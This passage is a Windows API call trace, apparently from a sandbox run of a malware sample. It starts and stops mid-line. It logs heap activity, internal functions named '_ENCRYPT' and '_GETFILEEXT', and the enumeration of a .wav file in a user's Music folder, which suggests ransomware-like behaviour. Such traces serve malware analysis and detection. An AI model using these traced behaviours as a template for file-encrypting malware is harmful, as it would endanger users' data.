RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.873] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.874] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0184.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0184.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0184.875] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.876] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.876] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0184.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0184.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.877] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0184.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0184.877] CloseHandle (hObject=0x120) returned 1 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.878] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.878] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0184.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0184.879] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0184.879] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0184.879] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.879] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0184.879] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.879] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0184.880] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.880] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.880] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67429e0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xd410af80, ftLastAccessTime.dwHighDateTime=0x1d5e380, ftLastWriteTime.dwLowDateTime=0xd410af80, ftLastWriteTime.dwHighDateTime=0x1d5e380, nFileSizeHigh=0x0, nFileSizeLow=0xdf62, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="APDdf3aoZrXaHEczyAP.wav", cAlternateFileName="APDDF3~1.WAV")) returned 0x90add8 [0184.881] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.881] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.881] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67429e0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xd410af80, ftLastAccessTime.dwHighDateTime=0x1d5e380, ftLastWriteTime.dwLowDateTime=0xd410af80, ftLastWriteTime.dwHighDateTime=0x1d5e380, nFileSizeHigh=0x0, nFileSizeLow=0xdf62, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="APDdf3aoZrXaHEczyAP.wav", cAlternateFileName="APDDF3~1.WAV")) returned 0x90add8 [0184.881] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.881] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, 